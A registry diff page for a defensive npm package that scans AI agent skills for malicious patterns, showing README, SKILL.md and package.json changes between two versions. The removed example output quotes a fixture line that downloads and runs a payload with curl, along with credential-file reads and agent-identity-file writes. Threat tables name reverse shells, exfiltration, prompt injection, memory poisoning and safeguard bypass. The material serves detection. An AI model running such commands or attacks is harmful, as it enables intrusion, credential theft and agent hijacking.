npm - @guava-parity/guard-scanner - Versions diffs - 5.1.0 → 8.0.0 - Mend

@guava-parity/guard-scanner 5.1.0 → 8.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (10) hide show

package/README.md CHANGED Viewed

@@ -2,25 +2,22 @@
 *The Original, Zero-Dependency Shield for the AI Agent Era.*
-As autonomous AI agents become more prevalent, the risk of executing untrusted or malicious skills increases. **guard-scanner** is an open-source, zero-dependency static and runtime security scanner designed to help protect developers' local machines from Prompt Injections, RCEs, and Memory Poisoning.
+As autonomous AI agents become more prevalent, the risk of executing untrusted or malicious skills increases. **guard-scanner** is an open-source, zero-dependency security platform designed to protect developers from Prompt Injections, RCEs, Memory Poisoning, and supply chain attacks.
-Built collaboratively by the **[Guava Parity Institute](https://github.com/koatora20)** and the open-source community. We believe that AI safety infrastructure should be a shared, transparent, and accessible resource for everyone. We welcome contributions, feedback, and discussion from all developers!
+Built by the **[Guava Parity Institute](https://github.com/koatora20)** and the open-source community.
-**150 static patterns + 26 runtime checks** across **23 threat categories**.
+**166 static patterns + 26 runtime checks + asset audit + VirusTotal integration + real-time watch.**
-[![npm](https://img.shields.io/npm/v/guard-scanner)](https://www.npmjs.com/package/guard-scanner)
+[![npm](https://img.shields.io/npm/v/@guava-parity/guard-scanner)](https://www.npmjs.com/package/@guava-parity/guard-scanner)
 [![license](https://img.shields.io/npm/l/guard-scanner)](LICENSE)
+[![tests](https://img.shields.io/badge/tests-206%2F206-brightgreen)](#test-results)
 ## Install
 ```bash
-npm install -g guard-scanner
+npm install -g @guava-parity/guard-scanner
 ```
-> **Why use this?** If you are experimenting with third-party skills for your AI agents, `guard-scanner` acts as a basic safety net, helping to identify hidden prompts or dangerous execution patterns.
->
-> 🤝 **We need your help!**: The landscape of Agentic AI threats is evolving rapidly. We are maintaining this project out of goodwill to provide a baseline defense, but we rely on community contributions to keep our pattern database updated. If you find a false positive or a new threat vector, please consider opening an issue or a pull request!
 ## Quick Start
 ```bash
@@ -36,12 +33,10 @@ guard-scanner ./skills/ --format sarif --quiet | upload-sarif
 ## 🔍 Example Scan Output
-This is actual output from scanning a malicious test skill demonstrating data exfiltration, memory poisoning, and credential theft:
 ```console
 $ guard-scanner ./test/fixtures/malicious-skill/ --verbose
-🛡️  guard-scanner v5.0.5
+🛡️  guard-scanner v8.0.0
 ══════════════════════════════════════════════════════
 📂 Scanning: ./test/fixtures/malicious-skill/
 📦 Skills found: 1
@@ -52,38 +47,84 @@ $ guard-scanner ./test/fixtures/malicious-skill/ --verbose
    📁 malicious-code
       🔴 [HIGH] eval() call — evil.js:18
       💀 [CRITICAL] Shell download/execution — stealer.js:19
-         └─ "exec(`curl https://91.92.242.30/payload -o /tmp/x && bash"
    📁 credential-handling
       🔴 [HIGH] Credential file read — evil.js:6
-         └─ "readFileSync('.env"
       💀 [CRITICAL] Agent identity file read — evil.js:7
-         └─ "readFileSync('SOUL.md"
    📁 memory-poisoning
       💀 [CRITICAL] Write to agent soul file — evil.js:21
-         └─ "writeFileSync('SOUL.md"
-   📁 data-flow
-      💀 [CRITICAL] Data flow: secret read (L6) → network call (L10) — evil.js:6
+```
-══════════════════════════════════════════════════════
-📊 guard-scanner Scan Summary
-──────────────────────────────────────────────────────
-   Scanned:      1
-   🟢 Clean:       0
-   🔴 Malicious:   1
-   Safety Rate:  0%
-══════════════════════════════════════════════════════
-⚠️  CRITICAL: 1 malicious skill(s) detected!
+## 🔎 Asset Audit (V6+)
+Audit your npm packages, GitHub repos, and ClawHub skills for leaked credentials and security exposure.
+```bash
+# npm — detect leaked node_modules, .env files, scope duplicates
+guard-scanner audit npm <username> --verbose
+# GitHub — detect committed secrets, large repos, .env/.key files
+guard-scanner audit github <username> --format json
+# ClawHub — detect malicious skills, suspicious DL/star ratios
+guard-scanner audit clawhub <query>
+# All providers at once
+guard-scanner audit all <username> --verbose
+```
+## 🦠 VirusTotal Integration (V7+)
+Combine guard-scanner's semantic detection with VirusTotal's 70+ antivirus engines for **Double-Layered Defense**.
+| Layer | Engine | Focus |
+|---|---|---|
+| **Semantic** | guard-scanner | Prompt injection, memory poisoning, supply chain |
+| **Signature** | VirusTotal | Known malware, trojans, C2 infrastructure |
+```bash
+# 1. Get free API key at https://www.virustotal.com (¥0)
+# 2. Set environment variable
+export VT_API_KEY=your-api-key-here
+# 3. Use with any command
+guard-scanner scan ./skills/ --vt-scan
+guard-scanner audit npm koatora20 --vt-scan
+```
+> **Free tier**: 4 req/min, 500/day, 15,500/month. Personal use only.
+> **VT is optional** — guard-scanner works fully without it.
+## 👁️ Real-time Watch Mode (V8+)
+Monitor your skills directory for changes and scan automatically.
+```bash
+# Start watching
+guard-scanner watch ./skills/ --strict --verbose
+# With Soul Lock protection
+guard-scanner watch ./skills/ --strict --soul-lock
 ```
-## 🚀 Standalone Architecture
+Press `Ctrl+C` for session stats.
+## 📊 CI/CD Integration (V8+)
-**guard-scanner** is designed as a foundational "Shield" for the OpenClaw ecosystem.
-It features a **Standalone Boot Sequence**:
-- **Zero API/DB Dependencies**: It initializes purely from local, static Threat Patterns (147 regex rules) defined in its codebase.
-- **No Heavy Context Loading**: It does *not* require loading heavy memory databases or executing contextual commands.
-- **Privacy First**: It never accesses or exposes your agent's private memory during the boot phase.
+Native support for CI/CD pipelines via `CIReporter`:
+| Platform | Format |
+|---|---|
+| GitHub Actions | `::error` / `::warning` annotations + Step Summary |
+| GitLab | Code Quality JSON report |
+| Any | Webhook notification (HTTPS POST) |
+```bash
+# GitHub Actions
+guard-scanner ./skills/ --format sarif --quiet > report.sarif
-This lightweight initialization makes it perfect for zero-trust environments, ensuring complete safety without exposing proprietary agent logic.
+# GitLab
+guard-scanner ./skills/ --format json --quiet > gl-code-quality-report.json
+```
 ## Options
@@ -92,12 +133,13 @@ This lightweight initialization makes it perfect for zero-trust environments, en
 | `--verbose`, `-v` | Detailed findings with categories and samples |
 | `--strict` | Lower detection thresholds (more sensitive) |
 | `--check-deps` | Scan `package.json` for dependency chain risks |
-| `--soul-lock` | Enable agent identity protection (SOUL.md/MEMORY.md patterns) |
+| `--soul-lock` | Enable agent identity protection |
+| `--vt-scan` | Enable VirusTotal hash/URL/domain lookup |
 | `--json` | Write JSON report to file |
-| `--sarif` | Write SARIF 2.1.0 report (GitHub Code Scanning) |
+| `--sarif` | Write SARIF 2.1.0 report |
 | `--html` | Write HTML dashboard report |
 | `--format json\|sarif` | Print to stdout (pipeable) |
-| `--quiet` | Suppress text output (use with `--format`) |
+| `--quiet` | Suppress text output |
 | `--self-exclude` | Skip scanning guard-scanner itself |
 | `--summary-only` | Only print the summary table |
 | `--rules <file>` | Load custom detection rules (JSON) |
@@ -107,31 +149,28 @@ This lightweight initialization makes it perfect for zero-trust environments, en
 ## Threat Categories (23)
 | # | Category | Detects |
-|---|----------|---------|
-| 1 | Prompt Injection | Hidden instructions, invisible Unicode, homoglyphs, XML tag injection |
-| 2 | Malicious Code | `eval()`, `child_process`, reverse shells, raw sockets |
-| 3 | Suspicious Downloads | `curl\|bash`, executable downloads, password-protected archives |
-| 4 | Credential Handling | `.env` reads, SSH keys, sudo in instructions |
-| 5 | Secret Detection | Hardcoded API keys, AWS keys, GitHub tokens, Shannon entropy |
-| 6 | Exfiltration | webhook.site, DNS tunneling, curl data exfil |
+|---|----------|---------|
+| 1 | Prompt Injection | Hidden instructions, invisible Unicode, homoglyphs |
+| 2 | Malicious Code | `eval()`, `child_process`, reverse shells |
+| 3 | Suspicious Downloads | `curl\|bash`, executable downloads |
+| 4 | Credential Handling | `.env` reads, SSH keys |
+| 5 | Secret Detection | Hardcoded API keys, Shannon entropy |
+| 6 | Exfiltration | webhook.site, DNS tunneling |
 | 7 | Unverifiable Deps | Remote dynamic imports |
-| 8 | Financial Access | Crypto transactions, payment APIs |
-| 9 | Obfuscation | Base64→exec, hex encoding, `String.fromCharCode` |
-| 10 | Prerequisites Fraud | Fake download/paste instructions |
-| 11 | Leaky Skills | Secrets saved in agent memory, verbatim in commands |
-| 12 | Memory Poisoning ⚿ | SOUL.md/MEMORY.md modification, behavioral rule override |
-| 13 | Prompt Worm | Self-replicating prompts, agent-to-agent propagation |
-| 14 | Persistence | Cron, launchd, startup execution |
-| 15 | CVE Patterns | CVE-2026-25253 (RCE), CVE-2026-25905 (Pyodide), CVE-2026-27825 (path traversal) |
-| 16 | MCP Security | Tool/schema poisoning, SSRF, shadow server registration |
-| 16b | Trust Boundary | Calendar/email/web → code execution chains |
-| 16c | Advanced Exfiltration | ZombieAgent static URL arrays, drip exfil, beacon |
-| 16d | Safeguard Bypass | URL parameter injection, retry-on-block |
-| 17 | Identity Hijacking ⚿ | SOUL.md overwrite, persona swap, memory wipe |
-| 18 | Config Impact | `openclaw.json` writes, exec approval disabling |
-| 19 | PII Exposure | Hardcoded CC/SSN, PII logging, Shadow AI API calls |
-| 20 | Trust Exploitation | Authority claims, creator impersonation, fake audits |
-| 21 | VDB Injection | Vector database poisoning, embedding manipulation |
+| 8 | Financial Access | Crypto transactions |
+| 9 | Obfuscation | Base64→exec, hex encoding |
+| 10 | Prerequisites Fraud | Fake download instructions |
+| 11 | Leaky Skills | Secrets in memory |
+| 12 | Memory Poisoning ⚿ | SOUL.md modification |
+| 13 | Prompt Worm | Self-replicating prompts |
+| 14 | Persistence | Cron, launchd |
+| 15 | CVE Patterns | CVE-2026-2256/25046/25253/25905/27825 |
+| 16 | MCP Security | Tool poisoning, SSRF, shadow servers |
+| 17 | Identity Hijacking ⚿ | Persona swap, memory wipe |
+| 18 | Config Impact | OpenClaw config writes |
+| 19 | PII Exposure | CC/SSN, Shadow AI calls |
+| 20 | Trust Exploitation | Authority claims, fake audits |
+| 21 | VDB Injection | Vector DB poisoning |
 > ⚿ = Requires `--soul-lock` flag (opt-in)
@@ -141,60 +180,44 @@ Real-time `before_tool_call` hook that blocks dangerous operations.
 | Layer | Name | Checks |
 |-------|------|--------|
-| 1 | Threat Detection | Reverse shell, curl\|bash, SSRF, credential exfil |
+| 1 | Threat Detection | Reverse shell, curl\|bash, SSRF |
 | 2 | Trust Defense | SOUL.md tampering, memory injection |
-| 3 | Safety Judge | Prompt injection in tool args, trust bypass |
+| 3 | Safety Judge | Prompt injection in tool args |
 | 4 | Behavioral | No-research execution |
-| 5 | Trust Exploitation (ASI09) | Authority claim, creator bypass, fake audit |
-```bash
-# Install as OpenClaw hook
-openclaw hooks install skills/guard-scanner/hooks/guard-scanner
-openclaw hooks enable guard-scanner
-```
-Modes: `monitor` (log only) / `enforce` (block CRITICAL) / `strict` (block HIGH+CRITICAL)
-## OWASP Mapping
-- **OWASP LLM Top 10 2025**: LLM01–LLM10 fully mapped
-- **OWASP Agentic Security Top 10**: ASI01–ASI10 coverage (tested)
+| 5 | Trust Exploitation | Authority claim, creator bypass |
 ## Test Results
 ```
-ℹ tests 136
-ℹ suites 24
-ℹ pass 136
+ℹ tests 206
+ℹ suites 43
+ℹ pass 206
 ℹ fail 0
-ℹ duration_ms 165
+ℹ duration_ms 376
 ```
 | Suite | Tests |
 |-------|-------|
 | Malicious Skill Detection | 16 ✅ |
 | Clean Skill (False Positive) | 2 ✅ |
-| Risk Score Calculation | 5 ✅ |
-| Verdict Determination | 5 ✅ |
+| Risk Score / Verdict | 10 ✅ |
 | Output Formats (JSON/SARIF/HTML) | 4 ✅ |
-| Pattern Database (150 patterns, 23 categories) | 4 ✅ |
+| Pattern DB (166 patterns, 23 cats) | 4 ✅ |
 | IoC Database | 5 ✅ |
 | Shannon Entropy | 2 ✅ |
-| Ignore Functionality | 1 ✅ |
-| Plugin API | 1 ✅ |
-| Skill Manifest Validation | 4 ✅ |
-| Code Complexity Metrics | 2 ✅ |
-| Report Noise Regression | 2 ✅ |
-| Config Impact Analysis | 4 ✅ |
-| PII Exposure Detection | 8 ✅ |
-| OWASP Agentic Security (ASI01–10) | 14 ✅ |
-| Runtime Guard (5 layers, 26 checks) | 25 ✅ |
-| CVE Detection (CVE-2026-25905, CVE-2026-27825) | 2 ✅ |
+| Plugin API / Custom Rules | 2 ✅ |
+| Skill Manifest | 4 ✅ |
+| Code Complexity | 2 ✅ |
+| Config / PII / OWASP | 26 ✅ |
+| Runtime Guard (5 layers) | 25 ✅ |
+| CVE Detection | 5 ✅ |
+| **Asset Audit (npm/GitHub/ClawHub)** | **32 ✅** |
+| **VirusTotal Integration** | **20 ✅** |
+| **Watcher + CI/CD** | **15 ✅** |
 ## Plugin API
 ```javascript
-// my-plugin.js
 module.exports = {
   name: 'my-plugin',
   patterns: [
@@ -207,43 +230,9 @@ module.exports = {
 guard-scanner ./skills/ --plugin ./my-plugin.js
 ```
-## Custom Rules (JSON)
-```json
-[
-  {
-    "id": "CUSTOM_001",
-    "pattern": "dangerous_function\\(",
-    "flags": "gi",
-    "severity": "HIGH",
-    "cat": "malicious-code",
-    "desc": "Custom: dangerous function call",
-    "codeOnly": true
-  }
-]
-```
-```bash
-guard-scanner ./skills/ --rules ./my-rules.json
-```
-## Output Formats
-- **Terminal** — Color-coded verdicts with risk scores
-- **JSON** — Machine-readable report (`--json`)
-- **SARIF 2.1.0** — GitHub Code Scanning / CI/CD (`--sarif`)
-- **HTML** — Visual dashboard (`--html`)
-- **stdout** — Pipeable output (`--format json|sarif --quiet`)
 ## Contributing
-We wholeheartedly welcome contributions! Guard-scanner is built on community knowledge.
-Whether you're fixing a bug, adding a new threat pattern, or simply improving the documentation, your help is deeply appreciated. Please see our [CONTRIBUTING.md](CONTRIBUTING.md) for guidelines on how to get started.
-## Code of Conduct
-We are committed to fostering a welcoming, respectful, and harassment-free environment. Please read our [CODE_OF_CONDUCT.md](CODE_OF_CONDUCT.md) before participating in our community.
+We welcome contributions! Whether fixing bugs, adding threat patterns, or improving docs.
 ## License

package/SKILL.md CHANGED Viewed

@@ -1,11 +1,12 @@
 ---
 name: guard-scanner
-description: "The #1 security scanner for AI agent skills on ClawHub. Scan skills for prompt injection, credential theft, exfiltration, malware, and 23 threat categories. 150 static patterns + 26 runtime checks. The most comprehensive skill scanner and security auditor for OpenClaw — zero dependencies, 0.016ms/scan."
+description: "AI agent security platform. 166 static patterns + 26 runtime checks + npm/GitHub/ClawHub asset audit + VirusTotal integration + real-time file watch. Zero dependencies, 0.016ms/scan."
 metadata:
   clawdbot:
     homepage: "https://github.com/koatora20/guard-scanner"
 requires:
-  env: {}
+  env:
+    VT_API_KEY: "Optional. VirusTotal API key for --vt-scan (free at virustotal.com)"
 files:
   - "dist/*"
   - "src/*"
@@ -13,129 +14,78 @@ files:
   - "openclaw.plugin.json"
 ---
-# guard-scanner 🛡️ — The #1 Skill Scanner for AI Agent Security
+# guard-scanner 🛡️
-The most comprehensive security scanner and skill auditor for OpenClaw agents.
-**150 static patterns + 26 runtime checks (5 layers)** across **23 threat categories**. The go-to scanner for protecting your AI agent workspace — zero dependencies, MIT licensed. **0.016ms/scan.**
+166 static patterns + 26 runtime checks (5 layers), 23 threat categories + asset audit + VirusTotal + real-time watch. Zero deps, MIT licensed.
-## When To Use This Skill
+## When To Use
-- **Before installing a new skill** from ClawHub or any external source
-- **After updating skills** to check for newly introduced threats
-- **Periodically** to audit your installed skills
-- **In CI/CD** to gate skill deployments
+- Before installing a new skill / After updating skills / In CI/CD pipelines
+- Auditing npm/GitHub/ClawHub for leaked credentials
+- Real-time monitoring during development
 ## Quick Start
-### 1. Static Scan (Immediate)
-Scan all installed skills:
 ```bash
+# Scan all skills
 npx guard-scanner ~/.openclaw/workspace/skills/ --verbose --self-exclude
-```
-Scan a specific skill:
-```bash
-npx guard-scanner /path/to/new-skill/ --strict --verbose
-```
+# Asset Audit (check npm/GitHub for leaks)
+guard-scanner audit npm <your-npm-username> --verbose
+guard-scanner audit github <your-github-username> --format json
+guard-scanner audit all <username>
-### 2. Runtime Guard (OpenClaw Plugin Hook)
+# VirusTotal Double-Layered Defense (optional, free)
+VT_API_KEY=your-key guard-scanner scan ./skills/ --vt-scan
-Blocks dangerous tool calls in real-time via `before_tool_call` hook. 26 checks, 5 layers, 3 enforcement modes.
+# Real-time Watch Mode
+guard-scanner watch ./skills/ --strict --verbose
-```bash
-openclaw hooks install skills/guard-scanner/hooks/guard-scanner
-openclaw hooks enable guard-scanner
-openclaw hooks list
+# CI/CD pipeline
+guard-scanner ./skills/ --format sarif --quiet | upload-sarif
 ```
-### 3. Recommended order
+## VirusTotal Integration
+guard-scanner combines its own 166 semantic patterns with VirusTotal's 70+ antivirus engines for **Double-Layered Defense**:
+| Layer | Engine | Focus |
+|---|---|---|
+| Semantic | guard-scanner | Prompt injection, memory poisoning, supply chain |
+| Signature | VirusTotal | Known malware, trojans, C2 infrastructure |
 ```bash
-# Pre-install / pre-update gate first
-npx guard-scanner ~/.openclaw/workspace/skills/ --verbose --self-exclude --html
+# Get your free API key at https://www.virustotal.com
+# Set it as environment variable
+export VT_API_KEY=your-api-key-here
-# Then keep runtime monitoring enabled
-openclaw hooks install skills/guard-scanner/hooks/guard-scanner
-openclaw hooks enable guard-scanner
+# Use with any command
+guard-scanner scan ./skills/ --vt-scan
+guard-scanner audit npm koatora20 --vt-scan
 ```
-## Runtime Guard Modes
+Free tier: 4 req/min, 500/day, 15,500/month. VT is **optional** — guard-scanner works fully without it.
-Set in `openclaw.json` → `plugins.guard-scanner.mode`:
+## Runtime Modes
 | Mode | Behavior |
 |------|----------|
 | `monitor` | Log all, never block |
-| `enforce` (default) | Block CRITICAL threats |
+| `enforce` (default) | Block CRITICAL |
 | `strict` | Block HIGH + CRITICAL |
-## Threat Categories (23)
-| # | Category | What It Detects |
-|---|----------|----------------|
-| 1 | Prompt Injection | Hidden instructions, invisible Unicode, homoglyphs |
-| 2 | Malicious Code | eval(), child_process, reverse shells |
-| 3 | Suspicious Downloads | curl\|bash, executable downloads |
-| 4 | Credential Handling | .env reads, SSH key access |
-| 5 | Secret Detection | Hardcoded API keys and tokens |
-| 6 | Exfiltration | webhook.site, DNS tunneling |
-| 7 | Unverifiable Deps | Remote dynamic imports |
-| 8 | Financial Access | Crypto wallets, payment APIs |
-| 9 | Obfuscation | Base64→eval, String.fromCharCode |
-| 10 | Prerequisites Fraud | Fake download instructions |
-| 11 | Leaky Skills | Secret leaks through LLM context |
-| 12 | Memory Poisoning\* | Agent memory modification |
-| 13 | Prompt Worm | Self-replicating instructions |
-| 14 | Persistence | Cron jobs, startup execution |
-| 15 | CVE Patterns | CVE-2026-25253, CVE-2026-25905, CVE-2026-27825 |
-| 16 | MCP Security | Tool/schema poisoning, SSRF |
-| 17 | Identity Hijacking\* | SOUL.md/IDENTITY.md tampering |
-| 18 | Sandbox Validation | Dangerous binaries, broad file scope |
-| 19 | Code Complexity | Excessive file length, deep nesting |
-| 20 | Config Impact | openclaw.json writes, exec approval bypass |
-| 21 | PII Exposure | CC/SSN, PII logging, Shadow AI |
-| 22 | Trust Exploitation | Authority claims, creator impersonation |
-| 23 | VDB Injection | Vector database poisoning, embedding manipulation |
-\* = Requires `--soul-lock` flag
+## 23 Threat Categories
-## External Endpoints
+Prompt Injection, Malicious Code, Suspicious Downloads, Credential Handling, Secret Detection, Exfiltration, Unverifiable Deps, Financial Access, Obfuscation, Prerequisites Fraud, Leaky Skills, Memory Poisoning*, Prompt Worm, Persistence, CVE Patterns, MCP Security, Identity Hijacking*, Sandbox Validation, Code Complexity, Config Impact, PII Exposure, Trust Exploitation, VDB Injection.
-| URL | Data Sent | Purpose |
-|-----|-----------|---------|
-| *(none)* | *(none)* | guard-scanner makes **zero** network requests. All scanning is local. |
+\* = Requires `--soul-lock` flag
 ## Security & Privacy
-- **No network access**: guard-scanner never connects to external servers
-- **Read-only scanning**: Only reads files, never modifies scanned directories
-- **No telemetry**: No usage data, analytics, or crash reports are collected
-- **Local reports only**: Output files (JSON/SARIF/HTML) are written to the scan directory
-- **No environment variable access**: Does not read or process any secrets or API keys
-- **Runtime Guard audit log**: Detections logged locally to `~/.openclaw/guard-scanner/audit.jsonl`
-## Model Invocation Note
-guard-scanner **does not invoke any LLM or AI model**. All detection is performed
-through static pattern matching, regex analysis, Shannon entropy calculation,
-and data flow analysis — entirely deterministic, no model calls.
-## Trust Statement
-guard-scanner was created by Guava 🍈 & Dee after experiencing a real 3-day
-identity hijack incident in February 2026. A malicious skill silently replaced
-an AI agent's SOUL.md personality file, and no existing tool could detect it.
+Zero network requests (unless `--vt-scan`). Read-only scanning. No telemetry. No env access. Deterministic. Your VT API key stays local.
-- **Open source**: https://github.com/koatora20/guard-scanner
-- **Zero dependencies**: Nothing to audit, no transitive risks
-- **Test suite**: 139 tests across 24 suites, 100% pass rate
-- **Taxonomy**: Based on Snyk ToxicSkills (Feb 2026), OWASP MCP Top 10, and original research
-- **OWASP**: ASI01–ASI10 coverage 90% (9/10 verified)
-- **CVE coverage**: CVE-2026-2256, CVE-2026-25046, CVE-2026-25253, CVE-2026-25905, CVE-2026-27825
+## Trust
-## License
+Open source, zero deps, **206 tests / 43 suites** 100% pass. OWASP LLM Top 10 + Agentic Security Top 10 coverage.
 MIT — [LICENSE](LICENSE)

package/package.json CHANGED Viewed

@@ -1,11 +1,11 @@
 {
     "name": "@guava-parity/guard-scanner",
-    "version": "5.1.0",
+    "version": "8.0.0",
     "publishConfig": {
         "access": "public",
         "registry": "https://registry.npmjs.org/"
     },
-    "description": "Agent security scanner + runtime guard — 150 static patterns (23 categories), 26 runtime checks (5 layers), 0.016ms/scan, before_tool_call hook, CLI, SARIF. OpenClaw-compatible plugin.",
+    "description": "Agent security scanner + asset audit platform — 166 static patterns (23 categories), 26 runtime checks (5 layers), npm/GitHub/ClawHub asset auditing, 0.016ms/scan, before_tool_call hook, CLI, SARIF. OpenClaw-compatible plugin.",
     "openclaw.extensions": "./openclaw.plugin.json",
     "openclaw.hooks": {
         "guard-scanner": "./hooks/guard-scanner"